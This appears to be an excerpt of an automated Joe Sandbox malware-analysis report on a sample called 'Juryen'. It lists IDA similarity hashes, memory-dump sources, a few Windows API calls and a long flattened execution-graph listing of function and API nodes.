                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                                                    • Instruction ID: 6b1c66eb9f97b1ade68f1d395623a9ed29f1776dbc94043a645b3c6b65beda35
                                                                    • Opcode Fuzzy Hash: 0bdb7e84a84856003d11171116f50dfbd9bb9a779b2e7a3e4899fdc47cedc848
                                                                    • Instruction Fuzzy Hash: C5912270E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
                                                                    • Instruction ID: ce41943af36f178b06a8ef9aeec7331a28cc36c4f565c07526a7a1ecbc0683f6
                                                                    • Opcode Fuzzy Hash: be7a598e94a0405de8a772e3f69c54869daecda94b4303a07673bf76e2652f1c
                                                                    • Instruction Fuzzy Hash: 8C813571E04228CFDF24CFA8C844BADBBB1FB45305F24816AD456BB281D778A986DF45
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
                                                                    • Instruction ID: 8f4657df29e0a6c4f41eae1c6e560b42ebe12933d6c33c39fa024371cffe791d
                                                                    • Opcode Fuzzy Hash: 32d59b201beac9d8f322f7ad5055b4a277c8e7969ed8db35c8d1fbf5724c7b18
                                                                    • Instruction Fuzzy Hash: F4815771E04228DBDF24CFA8C8447ADBBB1FF44315F10816AD856BB281D7786986DF45
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
                                                                    • Instruction ID: 467485e0bb60f7ca81b57cb4e762169b1f98b62e9d0b722d18e83a7fcf81438f
                                                                    • Opcode Fuzzy Hash: 5ad3ccd1842de9fa96a72a1c56b2a37abd66cddd4bfb2a4aa43cc43f3deb674d
                                                                    • Instruction Fuzzy Hash: 04711375E04228CBDF24CFA8C844BADBBF1FB48305F15806AD856B7281D778A986DF45
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
                                                                    • Instruction ID: 8594309fab6a939f8579025671b20e25c27ad2f20b93bd04310bc8f9388019e2
                                                                    • Opcode Fuzzy Hash: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
                                                                    • Instruction Fuzzy Hash: A6713471E04228CBDF28CF98C844BADBBB1FF45305F14806AD816BB281D778A986DF45
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
                                                                    • Instruction ID: 804367245b599a5d262e6525417658d62bb0317a144133a249ff79fbb491f744
                                                                    • Opcode Fuzzy Hash: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
                                                                    • Instruction Fuzzy Hash: 04712571E04228CBDF28CF98C854BADBBB1FF44305F15806AD856B7281C778A986DF45
                                                                    APIs
                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBE
                                                                    • CharNextA.USER32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2512911969.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2512838969.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2512979332.0000000000408000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513040085.000000000040A000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 0000000B.00000002.2513128679.000000000044D000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                    • String ID:
                                                                    • API String ID: 190613189-0
                                                                    • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                    • Instruction ID: c3aaa261a9e4bb9915bd58c77e7651ea6c0a11e303954dac61c17192ece284d7
                                                                    • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                    • Instruction Fuzzy Hash: F7F06231105459EFDB029BA5DD00D9EBBA8EF15254B2540BAE840F7250D678DE019B69

                                                                    Execution Graph

                                                                    Execution Coverage: 6.4%
                                                                    Dynamic/Decrypted Code Coverage: 9.2%
                                                                    Signature Coverage: 3.5%
                                                                    Total number of Nodes: 2000
                                                                    Total number of Limit Nodes: 110
                                                                    execution_graph: node and edge data of the interactive execution graph (rendered as a graph on the original report page; the flattened node listing is not reproduced here)
38423->38424 38424->38417 38427 41f287 38424->38427 38428 41f27a 38424->38428 38425->38417 38432 4446ce 11 API calls 38425->38432 38429 41ee6b 86 API calls 38426->38429 38427->38421 38430 41ee6b 86 API calls 38428->38430 38431 41f2e0 38429->38431 38430->38419 38433 41b1ca memset 38431->38433 38432->38417 38433->38419 38434->38343 38435->38343 38436->38343 38437->38337 38438->38338 38440 417044 38439->38440 38441 41705c 38439->38441 38443 416760 11 API calls 38440->38443 38445 417055 38440->38445 38442 417075 38441->38442 38444 41707a 11 API calls 38441->38444 38442->38349 38443->38445 38444->38440 38445->38349 38447 41693e 38446->38447 38451 41698e 38446->38451 38448 41694c 38447->38448 38449 422fd1 memset 38447->38449 38450 4165a0 11 API calls 38448->38450 38448->38451 38449->38448 38452 416972 38450->38452 38451->38355 38452->38451 38453 422b84 15 API calls 38452->38453 38453->38451 38455 424f07 11 API calls 38454->38455 38456 4251e4 38455->38456 38457 4251f7 38456->38457 38458 4251e8 38456->38458 38461 4250f8 127 API calls 38457->38461 38459 4446ea 11 API calls 38458->38459 38460 4251f2 38459->38460 38460->38355 38462 425209 38461->38462 38464 425249 38462->38464 38465 4384e9 135 API calls 38462->38465 38466 424f74 124 API calls 38462->38466 38468 4250f8 127 API calls 38462->38468 38469 425287 38462->38469 38463 415c7d 16 API calls 38463->38460 38467 424ff0 13 API calls 38464->38467 38464->38469 38465->38462 38466->38462 38470 425266 38467->38470 38468->38462 38469->38463 38470->38469 38471 415be9 memcpy 38470->38471 38471->38469 38472->38352 38473->38355 38474->38355 38475->38355 38476->38355 38477->38355 38478->38373 38479->38356 38481 415c81 38480->38481 38483 415c9c 38480->38483 38482 416935 16 API calls 38481->38482 38481->38483 38482->38483 38483->38352 38484 4442e6 38483->38484 38485 4442eb 38484->38485 38488 444303 38484->38488 38486 41707a 11 API calls 38485->38486 38487 4442f2 38486->38487 38487->38488 38489 4446ea 11 API calls 38487->38489 
38488->38363 38490 444300 38489->38490 38490->38363 38491->38369 38492->38381 38493->38385 38499 415cfe 38494->38499 38500 41628e 38499->38500 38506 415d23 __aullrem __aulldvrm 38499->38506 38507 416520 38500->38507 38501 4163ca 38513 416422 11 API calls 38501->38513 38503 416172 memset 38503->38506 38504 416422 10 API calls 38504->38506 38505 415cb9 10 API calls 38505->38506 38506->38500 38506->38501 38506->38503 38506->38504 38506->38505 38508 416527 38507->38508 38512 416574 38507->38512 38510 416544 38508->38510 38508->38512 38514 4156aa 11 API calls 38508->38514 38511 416561 memcpy 38510->38511 38510->38512 38511->38512 38512->38252 38513->38500 38514->38510 38515->38024 38516->38030 38517->38040 38518->38042 38519->38039 38520->38043 38521->38042 38522->38047 38523->38049 38524->38051 38525->38053 38526->38055 38527->38057 38528->38059 38529->38066 38530->38069 38531->38073 38532->38074 38533->38077 38534->38077 38535->38089 38536->38089 38537->38095 38538->38088 38541 44080f 38539->38541 38542 4407a1 38539->38542 38541->38066 38549 43dfff memset 38542->38549 38543->38095 38544->38095 38545->38095 38546->38095 38547->38095 38548->38084 38549->38541 38550->38104 38551->38103 38553->38131 38554->38129 38555->38137 38556->38129 38557->38144 38558->38129 38559->38129 38560->38138 38561->38129 38562->38129 38563->38129 38564->38129 38565->38129 38566->38100 38567->38152 38576 4238ad memset memcpy 38568->38576 38570 423ca5 38571 415a91 memset 38570->38571 38572 423cc3 38571->38572 38572->38164 38573->38164 38574->38164 38575->38158 38576->38570 38577 41276d 38578 41277d 38577->38578 38620 4044a4 LoadLibraryW 38578->38620 38580 412785 38581 412789 38580->38581 38628 414b81 38580->38628 38584 4127c8 38634 412465 memset ??2@YAPAXI 38584->38634 38586 4127ea 38646 40ac21 38586->38646 38591 412813 38664 40dd07 memset 38591->38664 38592 412827 38669 40db69 memset 38592->38669 38595 412822 38690 4125b6 ??3@YAXPAX 38595->38690 38597 40ada2 _wcsicmp 38599 41283d 38597->38599 
38599->38595 38602 412863 CoInitialize 38599->38602 38674 41268e 38599->38674 38694 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 38602->38694 38605 41296f 38696 40b633 38605->38696 38607 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 38612 412957 CoUninitialize 38607->38612 38617 4128ca 38607->38617 38612->38595 38613 4128d0 TranslateAcceleratorW 38614 412941 GetMessageW 38613->38614 38613->38617 38614->38612 38614->38613 38615 412909 IsDialogMessageW 38615->38614 38615->38617 38616 4128fd IsDialogMessageW 38616->38614 38616->38615 38617->38613 38617->38615 38617->38616 38618 41292b TranslateMessage DispatchMessageW 38617->38618 38619 41291f IsDialogMessageW 38617->38619 38618->38614 38619->38614 38619->38618 38621 4044f7 38620->38621 38622 4044cf GetProcAddress 38620->38622 38626 404507 MessageBoxW 38621->38626 38627 40451e 38621->38627 38623 4044e8 FreeLibrary 38622->38623 38624 4044df 38622->38624 38623->38621 38625 4044f3 38623->38625 38624->38623 38625->38621 38626->38580 38627->38580 38629 414b8a 38628->38629 38630 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 38628->38630 38700 40a804 memset 38629->38700 38630->38584 38633 414b9e GetProcAddress 38633->38630 38635 4124e0 38634->38635 38636 412505 ??2@YAPAXI 38635->38636 38637 41251c 38636->38637 38642 412521 38636->38642 38722 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 38637->38722 38711 444722 38642->38711 38645 41259b wcscpy 38645->38586 38727 40b1ab free free 38646->38727 38648 40ad76 38728 40aa04 38648->38728 38651 40a9ce malloc memcpy free free 38654 40ac5c 38651->38654 38652 40ad4b 38652->38648 38751 40a9ce 38652->38751 38654->38648 38654->38651 38654->38652 38655 40ace7 free 38654->38655 38731 40a8d0 38654->38731 38743 4099f4 38654->38743 38655->38654 38659 40a8d0 7 API calls 38659->38648 38660 40ada2 38661 40adc9 38660->38661 38662 40adaa 38660->38662 38661->38591 38661->38592 38662->38661 38663 40adb3 _wcsicmp 
38662->38663 38663->38661 38663->38662 38756 40dce0 38664->38756 38666 40dd3a GetModuleHandleW 38761 40dba7 38666->38761 38670 40dce0 3 API calls 38669->38670 38671 40db99 38670->38671 38833 40dae1 38671->38833 38847 402f3a 38674->38847 38676 412766 38676->38595 38676->38602 38677 4126d3 _wcsicmp 38678 4126a8 38677->38678 38678->38676 38678->38677 38680 41270a 38678->38680 38881 4125f8 7 API calls 38678->38881 38680->38676 38850 411ac5 38680->38850 38691 4125da 38690->38691 38692 4125f0 38691->38692 38693 4125e6 DeleteObject 38691->38693 38695 40b1ab free free 38692->38695 38693->38692 38694->38607 38695->38605 38697 40b640 38696->38697 38698 40b639 free 38696->38698 38699 40b1ab free free 38697->38699 38698->38697 38699->38581 38701 40a83b GetSystemDirectoryW 38700->38701 38702 40a84c wcscpy 38700->38702 38701->38702 38707 409719 wcslen 38702->38707 38705 40a881 LoadLibraryW 38706 40a886 38705->38706 38706->38630 38706->38633 38708 409724 38707->38708 38709 409739 wcscat LoadLibraryW 38707->38709 38708->38709 38710 40972c wcscat 38708->38710 38709->38705 38709->38706 38710->38709 38712 444732 38711->38712 38713 444728 DeleteObject 38711->38713 38723 409cc3 38712->38723 38713->38712 38715 412551 38716 4010f9 38715->38716 38717 401130 38716->38717 38718 401134 GetModuleHandleW LoadIconW 38717->38718 38719 401107 wcsncat 38717->38719 38720 40a7be 38718->38720 38719->38717 38721 40a7d2 38720->38721 38721->38645 38721->38721 38722->38642 38726 409bfd memset wcscpy 38723->38726 38725 409cdb CreateFontIndirectW 38725->38715 38726->38725 38727->38654 38729 40aa14 38728->38729 38730 40aa0a free 38728->38730 38729->38660 38730->38729 38732 40a8eb 38731->38732 38733 40a8df wcslen 38731->38733 38734 40a906 free 38732->38734 38735 40a90f 38732->38735 38733->38732 38736 40a919 38734->38736 38737 4099f4 3 API calls 38735->38737 38738 40a932 38736->38738 38739 40a929 free 38736->38739 38737->38736 38741 4099f4 3 API calls 38738->38741 38740 40a93e memcpy 38739->38740 38740->38654 
38742 40a93d 38741->38742 38742->38740 38744 409a41 38743->38744 38745 4099fb malloc 38743->38745 38744->38654 38747 409a37 38745->38747 38748 409a1c 38745->38748 38747->38654 38749 409a30 free 38748->38749 38750 409a20 memcpy 38748->38750 38749->38747 38750->38749 38752 40a9e7 38751->38752 38753 40a9dc free 38751->38753 38754 4099f4 3 API calls 38752->38754 38755 40a9f2 38753->38755 38754->38755 38755->38659 38780 409bca GetModuleFileNameW 38756->38780 38758 40dce6 wcsrchr 38759 40dcf5 38758->38759 38760 40dcf9 wcscat 38758->38760 38759->38760 38760->38666 38781 44db70 38761->38781 38765 40dbfd 38784 4447d9 38765->38784 38768 40dc34 wcscpy wcscpy 38810 40d6f5 38768->38810 38769 40dc1f wcscpy 38769->38768 38772 40d6f5 3 API calls 38773 40dc73 38772->38773 38774 40d6f5 3 API calls 38773->38774 38775 40dc89 38774->38775 38776 40d6f5 3 API calls 38775->38776 38777 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38776->38777 38816 40da80 38777->38816 38780->38758 38782 40dbb4 memset memset 38781->38782 38783 409bca GetModuleFileNameW 38782->38783 38783->38765 38785 4447f4 38784->38785 38786 40dc1b 38785->38786 38787 444807 ??2@YAPAXI 38785->38787 38786->38768 38786->38769 38788 44481f 38787->38788 38789 444873 _snwprintf 38788->38789 38790 4448ab wcscpy 38788->38790 38823 44474a 8 API calls 38789->38823 38792 4448bb 38790->38792 38824 44474a 8 API calls 38792->38824 38793 4448a7 38793->38790 38793->38792 38795 4448cd 38825 44474a 8 API calls 38795->38825 38797 4448e2 38826 44474a 8 API calls 38797->38826 38799 4448f7 38827 44474a 8 API calls 38799->38827 38801 44490c 38828 44474a 8 API calls 38801->38828 38803 444921 38829 44474a 8 API calls 38803->38829 38805 444936 38830 44474a 8 API calls 38805->38830 38807 44494b 38831 44474a 8 API calls 38807->38831 38809 444960 ??3@YAXPAX 38809->38786 38811 44db70 38810->38811 38812 40d702 memset GetPrivateProfileStringW 38811->38812 38813 40d752 38812->38813 38814 40d75c WritePrivateProfileStringW 38812->38814 38813->38814 
38815 40d758 38813->38815 38814->38815 38815->38772 38817 44db70 38816->38817 38818 40da8d memset 38817->38818 38819 40daac LoadStringW 38818->38819 38822 40dac6 38819->38822 38821 40dade 38821->38595 38822->38819 38822->38821 38832 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38822->38832 38823->38793 38824->38795 38825->38797 38826->38799 38827->38801 38828->38803 38829->38805 38830->38807 38831->38809 38832->38822 38843 409b98 GetFileAttributesW 38833->38843 38835 40daea 38836 40daef wcscpy wcscpy GetPrivateProfileIntW 38835->38836 38842 40db63 38835->38842 38844 40d65d GetPrivateProfileStringW 38836->38844 38838 40db3e 38845 40d65d GetPrivateProfileStringW 38838->38845 38840 40db4f 38846 40d65d GetPrivateProfileStringW 38840->38846 38842->38597 38843->38835 38844->38838 38845->38840 38846->38842 38882 40eaff 38847->38882 38851 411ae2 memset 38850->38851 38852 411b8f 38850->38852 38922 409bca GetModuleFileNameW 38851->38922 38864 411a8b 38852->38864 38854 411b0a wcsrchr 38855 411b22 wcscat 38854->38855 38856 411b1f 38854->38856 38923 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38855->38923 38856->38855 38858 411b67 38924 402afb 38858->38924 38862 411b7f 38980 40ea13 SendMessageW memset SendMessageW 38862->38980 38865 402afb 27 API calls 38864->38865 38866 411ac0 38865->38866 38867 4110dc 38866->38867 38868 41113e 38867->38868 38873 4110f0 38867->38873 39005 40969c LoadCursorW SetCursor 38868->39005 38870 411143 39006 444a54 38870->39006 39009 4032b4 38870->39009 38871 4110f7 _wcsicmp 38871->38873 38872 411157 38874 40ada2 _wcsicmp 38872->38874 38873->38868 38873->38871 39027 410c46 10 API calls 38873->39027 38877 411167 38874->38877 38875 4111af 38877->38875 38878 4111a6 qsort 38877->38878 38878->38875 38881->38678 38883 40eb10 38882->38883 38895 40e8e0 38883->38895 38886 40eb6c memcpy memcpy 38887 40ebb7 38886->38887 38887->38886 38888 40ebf2 ??2@YAPAXI ??2@YAPAXI 38887->38888 38890 40d134 16 API calls 38887->38890 
38889 40ec65 38888->38889 38891 40ec2e ??2@YAPAXI 38888->38891 38905 40ea7f 38889->38905 38890->38887 38891->38889 38894 402f49 38894->38678 38896 40e8f2 38895->38896 38897 40e8eb ??3@YAXPAX 38895->38897 38898 40e900 38896->38898 38899 40e8f9 ??3@YAXPAX 38896->38899 38897->38896 38900 40e911 38898->38900 38901 40e90a ??3@YAXPAX 38898->38901 38899->38898 38902 40e931 ??2@YAPAXI ??2@YAPAXI 38900->38902 38903 40e921 ??3@YAXPAX 38900->38903 38904 40e92a ??3@YAXPAX 38900->38904 38901->38900 38902->38886 38903->38904 38904->38902 38906 40aa04 free 38905->38906 38907 40ea88 38906->38907 38908 40aa04 free 38907->38908 38909 40ea90 38908->38909 38910 40aa04 free 38909->38910 38911 40ea98 38910->38911 38912 40aa04 free 38911->38912 38913 40eaa0 38912->38913 38914 40a9ce 4 API calls 38913->38914 38915 40eab3 38914->38915 38916 40a9ce 4 API calls 38915->38916 38917 40eabd 38916->38917 38918 40a9ce 4 API calls 38917->38918 38919 40eac7 38918->38919 38920 40a9ce 4 API calls 38919->38920 38921 40ead1 38920->38921 38921->38894 38922->38854 38923->38858 38981 40b2cc 38924->38981 38926 402b0a 38927 40b2cc 27 API calls 38926->38927 38928 402b23 38927->38928 38929 40b2cc 27 API calls 38928->38929 38930 402b3a 38929->38930 38931 40b2cc 27 API calls 38930->38931 38932 402b54 38931->38932 38933 40b2cc 27 API calls 38932->38933 38934 402b6b 38933->38934 38935 40b2cc 27 API calls 38934->38935 38936 402b82 38935->38936 38937 40b2cc 27 API calls 38936->38937 38938 402b99 38937->38938 38939 40b2cc 27 API calls 38938->38939 38940 402bb0 38939->38940 38941 40b2cc 27 API calls 38940->38941 38942 402bc7 38941->38942 38943 40b2cc 27 API calls 38942->38943 38944 402bde 38943->38944 38945 40b2cc 27 API calls 38944->38945 38946 402bf5 38945->38946 38947 40b2cc 27 API calls 38946->38947 38948 402c0c 38947->38948 38949 40b2cc 27 API calls 38948->38949 38950 402c23 38949->38950 38951 40b2cc 27 API calls 38950->38951 38952 402c3a 38951->38952 38953 40b2cc 27 API calls 38952->38953 38954 402c51 
38953->38954 38955 40b2cc 27 API calls 38954->38955 38956 402c68 38955->38956 38957 40b2cc 27 API calls 38956->38957 38958 402c7f 38957->38958 38959 40b2cc 27 API calls 38958->38959 38960 402c99 38959->38960 38961 40b2cc 27 API calls 38960->38961 38962 402cb3 38961->38962 38963 40b2cc 27 API calls 38962->38963 38964 402cd5 38963->38964 38965 40b2cc 27 API calls 38964->38965 38966 402cf0 38965->38966 38967 40b2cc 27 API calls 38966->38967 38968 402d0b 38967->38968 38969 40b2cc 27 API calls 38968->38969 38970 402d26 38969->38970 38971 40b2cc 27 API calls 38970->38971 38972 402d3e 38971->38972 38973 40b2cc 27 API calls 38972->38973 38974 402d59 38973->38974 38975 40b2cc 27 API calls 38974->38975 38976 402d78 38975->38976 38977 40b2cc 27 API calls 38976->38977 38978 402d93 38977->38978 38979 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38978->38979 38979->38862 38980->38852 38984 40b58d 38981->38984 38983 40b2d1 38983->38926 38985 40b5a4 GetModuleHandleW FindResourceW 38984->38985 38986 40b62e 38984->38986 38987 40b5c2 LoadResource 38985->38987 38989 40b5e7 38985->38989 38986->38983 38988 40b5d0 SizeofResource LockResource 38987->38988 38987->38989 38988->38989 38989->38986 38997 40afcf 38989->38997 38991 40b608 memcpy 39000 40b4d3 memcpy 38991->39000 38993 40b61e 39001 40b3c1 18 API calls 38993->39001 38995 40b626 39002 40b04b 38995->39002 38998 40b04b ??3@YAXPAX 38997->38998 38999 40afd7 ??2@YAPAXI 38998->38999 38999->38991 39000->38993 39001->38995 39003 40b051 ??3@YAXPAX 39002->39003 39004 40b05f 39002->39004 39003->39004 39004->38986 39005->38870 39007 444a64 FreeLibrary 39006->39007 39008 444a83 39006->39008 39007->39008 39008->38872 39010 4032c4 39009->39010 39011 40b633 free 39010->39011 39012 403316 39011->39012 39028 44553b 39012->39028 39016 403480 39226 40368c 15 API calls 39016->39226 39018 403489 39019 40b633 free 39018->39019 39021 403495 39019->39021 39020 40333c 39020->39016 39022 4033a9 memset memcpy 
39020->39022 39023 4033ec wcscmp 39020->39023 39224 4028e7 11 API calls 39020->39224 39225 40f508 6 API calls 39020->39225 39021->38872 39022->39020 39022->39023 39023->39020 39026 403421 _wcsicmp 39026->39020 39027->38873 39029 445548 39028->39029 39030 445599 39029->39030 39227 40c768 39029->39227 39031 4455a8 memset 39030->39031 39038 4457f2 39030->39038 39310 403988 39031->39310 39041 445854 39038->39041 39412 403e2d memset memset memset memset memset 39038->39412 39039 4455e5 39050 445672 39039->39050 39055 44560f 39039->39055 39040 4458bb memset memset 39043 414c2e 17 API calls 39040->39043 39094 4458aa 39041->39094 39435 403c9c memset memset memset memset memset 39041->39435 39046 4458f9 39043->39046 39045 44595e memset memset 39053 414c2e 17 API calls 39045->39053 39054 40b2cc 27 API calls 39046->39054 39048 44558c 39294 444b06 39048->39294 39049 44557a 39049->39048 39508 4136c0 CoTaskMemFree 39049->39508 39321 403fbe memset memset memset memset memset 39050->39321 39051 445a00 memset memset 39458 414c2e 39051->39458 39052 445b22 39058 445bca 39052->39058 39059 445b38 memset memset memset 39052->39059 39063 44599c 39053->39063 39065 445909 39054->39065 39067 4087b3 338 API calls 39055->39067 39057 445849 39524 40b1ab free free 39057->39524 39066 445c8b memset memset 39058->39066 39132 445cf0 39058->39132 39070 445bd4 39059->39070 39071 445b98 39059->39071 39064 40b2cc 27 API calls 39063->39064 39078 4459ac 39064->39078 39075 409d1f 6 API calls 39065->39075 39079 414c2e 17 API calls 39066->39079 39076 445621 39067->39076 39068 44589f 39525 40b1ab free free 39068->39525 39069 445585 39085 414c2e 17 API calls 39070->39085 39071->39070 39081 445ba2 39071->39081 39074 403335 39223 4452e5 45 API calls 39074->39223 39089 445919 39075->39089 39510 4454bf 20 API calls 39076->39510 39077 445823 39077->39057 39099 4087b3 338 API calls 39077->39099 39090 409d1f 6 API calls 39078->39090 39091 445cc9 39079->39091 39597 4099c6 wcslen 39081->39597 39082 4456b2 39512 40b1ab 
free free 39082->39512 39084 40b2cc 27 API calls 39095 445a4f 39084->39095 39086 445be2 39085->39086 39097 40b2cc 27 API calls 39086->39097 39087 445d3d 39117 40b2cc 27 API calls 39087->39117 39088 445d88 memset memset memset 39100 414c2e 17 API calls 39088->39100 39526 409b98 GetFileAttributesW 39089->39526 39101 4459bc 39090->39101 39102 409d1f 6 API calls 39091->39102 39092 445879 39092->39068 39113 4087b3 338 API calls 39092->39113 39094->39040 39118 44594a 39094->39118 39474 409d1f wcslen wcslen 39095->39474 39107 445bf3 39097->39107 39099->39077 39110 445dde 39100->39110 39593 409b98 GetFileAttributesW 39101->39593 39112 445ce1 39102->39112 39103 445bb3 39600 445403 memset 39103->39600 39104 445680 39104->39082 39344 4087b3 memset 39104->39344 39116 409d1f 6 API calls 39107->39116 39108 445928 39108->39118 39527 40b6ef 39108->39527 39119 40b2cc 27 API calls 39110->39119 39617 409b98 GetFileAttributesW 39112->39617 39113->39092 39115 40b2cc 27 API calls 39124 445a94 39115->39124 39126 445c07 39116->39126 39127 445d54 _wcsicmp 39117->39127 39118->39045 39131 4459ed 39118->39131 39130 445def 39119->39130 39120 4459cb 39120->39131 39140 40b6ef 253 API calls 39120->39140 39479 40ae18 39124->39479 39125 44566d 39125->39038 39395 413d4c 39125->39395 39136 445389 259 API calls 39126->39136 39137 445d71 39127->39137 39200 445d67 39127->39200 39129 445665 39511 40b1ab free free 39129->39511 39138 409d1f 6 API calls 39130->39138 39131->39051 39131->39052 39132->39074 39132->39087 39132->39088 39133 445389 259 API calls 39133->39058 39142 445c17 39136->39142 39618 445093 23 API calls 39137->39618 39145 445e03 39138->39145 39140->39131 39141 4456d8 39147 40b2cc 27 API calls 39141->39147 39148 40b2cc 27 API calls 39142->39148 39144 44563c 39144->39129 39150 4087b3 338 API calls 39144->39150 39619 409b98 GetFileAttributesW 39145->39619 39146 40b6ef 253 API calls 39146->39074 39152 4456e2 39147->39152 39153 445c23 39148->39153 39149 445d83 39149->39074 39150->39144 39513 
